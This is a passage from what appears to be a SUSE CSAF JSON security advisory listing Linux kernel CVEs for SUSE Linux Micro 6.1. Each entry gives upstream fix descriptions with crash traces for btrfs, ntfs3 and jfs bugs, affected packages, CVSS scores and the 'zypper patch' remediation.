"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54117",
"url": "https://www.suse.com/security/cve/CVE-2023-54117"
},
{
"category": "external",
"summary": "SUSE Bug 1256348 for CVE-2023-54117",
"url": "https://bugzilla.suse.com/1256348"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54117"
},
{
"cve": "CVE-2023-54121",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54121"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix incorrect splitting in btrfs_drop_extent_map_range\n\nIn production we were seeing a variety of WARN_ON()\u0027s in the extent_map\ncode, specifically in btrfs_drop_extent_map_range() when we have to call\nadd_extent_mapping() for our second split.\n\nConsider the following extent map layout\n\n\tPINNED\n\t[0 16K) [32K, 48K)\n\nand then we call btrfs_drop_extent_map_range for [0, 36K), with\nskip_pinned == true. The initial loop will have\n\n\tstart = 0\n\tend = 36K\n\tlen = 36K\n\nwe will find the [0, 16k) extent, but since we are pinned we will skip\nit, which has this code\n\n\tstart = em_end;\n\tif (end != (u64)-1)\n\t\tlen = start + len - em_end;\n\nem_end here is 16K, so now the values are\n\n\tstart = 16K\n\tlen = 16K + 36K - 16K = 36K\n\nlen should instead be 20K. This is a problem when we find the next\nextent at [32K, 48K), we need to split this extent to leave [36K, 48k),\nhowever the code for the split looks like this\n\n\tsplit-\u003estart = start + len;\n\tsplit-\u003elen = em_end - (start + len);\n\nIn this case we have\n\n\tem_end = 48K\n\tsplit-\u003estart = 16K + 36K // this should be 16K + 20K\n\tsplit-\u003elen = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K\n\nand now we have an invalid extent_map in the tree that potentially\noverlaps other entries in the extent map. Even in the non-overlapping\ncase we will have split-\u003estart set improperly, which will cause problems\nwith any block related calculations.\n\nWe don\u0027t actually need len in this loop, we can simply use end as our\nend point, and only adjust start up when we find a pinned extent we need\nto skip.\n\nAdjust the logic to do this, which keeps us from inserting an invalid\nextent map.\n\nWe only skip_pinned in the relocation case, so this is relatively rare,\nexcept in the case where you are running relocation a lot, which can\nhappen with auto relocation on.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54121",
"url": "https://www.suse.com/security/cve/CVE-2023-54121"
},
{
"category": "external",
"summary": "SUSE Bug 1256267 for CVE-2023-54121",
"url": "https://bugzilla.suse.com/1256267"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54121"
},
{
"cve": "CVE-2023-54125",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54125"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Return error for inconsistent extended attributes\n\nntfs_read_ea is called when we want to read extended attributes. There\nare some sanity checks for the validity of the EAs. However, it fails to\nreturn a proper error code for the inconsistent attributes, which might\nlead to unpredicted memory accesses after return.\n\n[ 138.916927] BUG: KASAN: use-after-free in ntfs_set_ea+0x453/0xbf0\n[ 138.923876] Write of size 4 at addr ffff88800205cfac by task poc/199\n[ 138.931132]\n[ 138.933016] CPU: 0 PID: 199 Comm: poc Not tainted 6.2.0-rc1+ #4\n[ 138.938070] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n[ 138.947327] Call Trace:\n[ 138.949557] \u003cTASK\u003e\n[ 138.951539] dump_stack_lvl+0x4d/0x67\n[ 138.956834] print_report+0x16f/0x4a6\n[ 138.960798] ? ntfs_set_ea+0x453/0xbf0\n[ 138.964437] ? kasan_complete_mode_report_info+0x7d/0x200\n[ 138.969793] ? ntfs_set_ea+0x453/0xbf0\n[ 138.973523] kasan_report+0xb8/0x140\n[ 138.976740] ? ntfs_set_ea+0x453/0xbf0\n[ 138.980578] __asan_store4+0x76/0xa0\n[ 138.984669] ntfs_set_ea+0x453/0xbf0\n[ 138.988115] ? __pfx_ntfs_set_ea+0x10/0x10\n[ 138.993390] ? kernel_text_address+0xd3/0xe0\n[ 138.998270] ? __kernel_text_address+0x16/0x50\n[ 139.002121] ? unwind_get_return_address+0x3e/0x60\n[ 139.005659] ? __pfx_stack_trace_consume_entry+0x10/0x10\n[ 139.010177] ? arch_stack_walk+0xa2/0x100\n[ 139.013657] ? filter_irq_stacks+0x27/0x80\n[ 139.017018] ntfs_setxattr+0x405/0x440\n[ 139.022151] ? __pfx_ntfs_setxattr+0x10/0x10\n[ 139.026569] ? kvmalloc_node+0x2d/0x120\n[ 139.030329] ? kasan_save_stack+0x41/0x60\n[ 139.033883] ? kasan_save_stack+0x2a/0x60\n[ 139.037338] ? kasan_set_track+0x29/0x40\n[ 139.040163] ? kasan_save_alloc_info+0x1f/0x30\n[ 139.043588] ? __kasan_kmalloc+0x8b/0xa0\n[ 139.047255] ? __kmalloc_node+0x68/0x150\n[ 139.051264] ? kvmalloc_node+0x2d/0x120\n[ 139.055301] ? vmemdup_user+0x2b/0xa0\n[ 139.058584] __vfs_setxattr+0x121/0x170\n[ 139.062617] ? __pfx___vfs_setxattr+0x10/0x10\n[ 139.066282] __vfs_setxattr_noperm+0x97/0x300\n[ 139.070061] __vfs_setxattr_locked+0x145/0x170\n[ 139.073580] vfs_setxattr+0x137/0x2a0\n[ 139.076641] ? __pfx_vfs_setxattr+0x10/0x10\n[ 139.080223] ? __kasan_check_write+0x18/0x20\n[ 139.084234] do_setxattr+0xce/0x150\n[ 139.087768] setxattr+0x126/0x140\n[ 139.091250] ? __pfx_setxattr+0x10/0x10\n[ 139.094948] ? __virt_addr_valid+0xcb/0x140\n[ 139.097838] ? __call_rcu_common.constprop.0+0x1c7/0x330\n[ 139.102688] ? debug_smp_processor_id+0x1b/0x30\n[ 139.105985] ? kasan_quarantine_put+0x5b/0x190\n[ 139.109980] ? putname+0x84/0xa0\n[ 139.113886] ? __kasan_slab_free+0x11e/0x1b0\n[ 139.117961] ? putname+0x84/0xa0\n[ 139.121316] ? preempt_count_sub+0x1c/0xd0\n[ 139.124427] ? __mnt_want_write+0xae/0x100\n[ 139.127836] ? mnt_want_write+0x8f/0x150\n[ 139.130954] path_setxattr+0x164/0x180\n[ 139.133998] ? __pfx_path_setxattr+0x10/0x10\n[ 139.137853] ? __pfx_ksys_pwrite64+0x10/0x10\n[ 139.141299] ? debug_smp_processor_id+0x1b/0x30\n[ 139.145714] ? fpregs_assert_state_consistent+0x6b/0x80\n[ 139.150796] __x64_sys_setxattr+0x71/0x90\n[ 139.155407] do_syscall_64+0x3f/0x90\n[ 139.159035] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n[ 139.163843] RIP: 0033:0x7f108cae4469\n[ 139.166481] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 088\n[ 139.183764] RSP: 002b:00007fff87588388 EFLAGS: 00000286 ORIG_RAX: 00000000000000bc\n[ 139.190657] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f108cae4469\n[ 139.196586] RDX: 00007fff875883b0 RSI: 00007fff875883d1 RDI: 00007fff875883b6\n[ 139.201716] RBP: 00007fff8758c530 R08: 0000000000000001 R09: 00007fff8758c618\n[ 139.207940] R10: 0000000000000006 R11: 0000000000000286 R12: 00000000004004c0\n[ 139.214007] R13: 00007fff8758c610 R14: 0000000000000000 R15\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54125",
"url": "https://www.suse.com/security/cve/CVE-2023-54125"
},
{
"category": "external",
"summary": "SUSE Bug 1256117 for CVE-2023-54125",
"url": "https://bugzilla.suse.com/1256117"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54125"
},
{
"cve": "CVE-2023-54127",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54127"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/jfs: prevent double-free in dbUnmount() after failed jfs_remount()\n\nSyzkaller reported the following issue:\n==================================================================\nBUG: KASAN: double-free in slab_free mm/slub.c:3787 [inline]\nBUG: KASAN: double-free in __kmem_cache_free+0x71/0x110 mm/slub.c:3800\nFree of addr ffff888086408000 by task syz-executor.4/12750\n[...]\nCall Trace:\n \u003cTASK\u003e\n[...]\n kasan_report_invalid_free+0xac/0xd0 mm/kasan/report.c:482\n ____kasan_slab_free+0xfb/0x120\n kasan_slab_free include/linux/kasan.h:177 [inline]\n slab_free_hook mm/slub.c:1781 [inline]\n slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807\n slab_free mm/slub.c:3787 [inline]\n __kmem_cache_free+0x71/0x110 mm/slub.c:3800\n dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264\n jfs_umount+0x248/0x3b0 fs/jfs/jfs_umount.c:87\n jfs_put_super+0x86/0x190 fs/jfs/super.c:194\n generic_shutdown_super+0x130/0x310 fs/super.c:492\n kill_block_super+0x79/0xd0 fs/super.c:1386\n deactivate_locked_super+0xa7/0xf0 fs/super.c:332\n cleanup_mnt+0x494/0x520 fs/namespace.c:1291\n task_work_run+0x243/0x300 kernel/task_work.c:179\n resume_user_mode_work include/linux/resume_user_mode.h:49 [inline]\n exit_to_user_mode_loop+0x124/0x150 kernel/entry/common.c:171\n exit_to_user_mode_prepare+0xb2/0x140 kernel/entry/common.c:203\n __syscall_exit_to_user_mode_work kernel/entry/common.c:285 [inline]\n syscall_exit_to_user_mode+0x26/0x60 kernel/entry/common.c:296\n do_syscall_64+0x49/0xb0 arch/x86/entry/common.c:86\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[...]\n \u003c/TASK\u003e\n\nAllocated by task 13352:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x3d/0x60 mm/kasan/common.c:52\n ____kasan_kmalloc mm/kasan/common.c:371 [inline]\n __kasan_kmalloc+0x97/0xb0 mm/kasan/common.c:380\n kmalloc include/linux/slab.h:580 [inline]\n dbMount+0x54/0x980 fs/jfs/jfs_dmap.c:164\n jfs_mount+0x1dd/0x830 fs/jfs/jfs_mount.c:121\n jfs_fill_super+0x590/0xc50 fs/jfs/super.c:556\n mount_bdev+0x26c/0x3a0 fs/super.c:1359\n legacy_get_tree+0xea/0x180 fs/fs_context.c:610\n vfs_get_tree+0x88/0x270 fs/super.c:1489\n do_new_mount+0x289/0xad0 fs/namespace.c:3145\n do_mount fs/namespace.c:3488 [inline]\n __do_sys_mount fs/namespace.c:3697 [inline]\n __se_sys_mount+0x2d3/0x3c0 fs/namespace.c:3674\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nFreed by task 13352:\n kasan_save_stack mm/kasan/common.c:45 [inline]\n kasan_set_track+0x3d/0x60 mm/kasan/common.c:52\n kasan_save_free_info+0x27/0x40 mm/kasan/generic.c:518\n ____kasan_slab_free+0xd6/0x120 mm/kasan/common.c:236\n kasan_slab_free include/linux/kasan.h:177 [inline]\n slab_free_hook mm/slub.c:1781 [inline]\n slab_free_freelist_hook+0x12e/0x1a0 mm/slub.c:1807\n slab_free mm/slub.c:3787 [inline]\n __kmem_cache_free+0x71/0x110 mm/slub.c:3800\n dbUnmount+0xf4/0x110 fs/jfs/jfs_dmap.c:264\n jfs_mount_rw+0x545/0x740 fs/jfs/jfs_mount.c:247\n jfs_remount+0x3db/0x710 fs/jfs/super.c:454\n reconfigure_super+0x3bc/0x7b0 fs/super.c:935\n vfs_fsconfig_locked fs/fsopen.c:254 [inline]\n __do_sys_fsconfig fs/fsopen.c:439 [inline]\n __se_sys_fsconfig+0xad5/0x1060 fs/fsopen.c:314\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[...]\n\nJFS_SBI(ipbmap-\u003ei_sb)-\u003ebmap wasn\u0027t set to NULL after kfree() in\ndbUnmount().\n\nSyzkaller uses faultinject to reproduce this KASAN double-free\nwarning. The issue is triggered if either diMount() or dbMount() fail\nin jfs_remount(), since diUnmount() or dbUnmount() already happened in\nsuch a case - they will do double-free on next execution: jfs_umount\nor jfs_remount.\n\nTested on both upstream and jfs-next by syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54127",
"url": "https://www.suse.com/security/cve/CVE-2023-54127"
},
{
"category": "external",
"summary": "SUSE Bug 1256119 for CVE-2023-54127",
"url": "https://bugzilla.suse.com/1256119"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
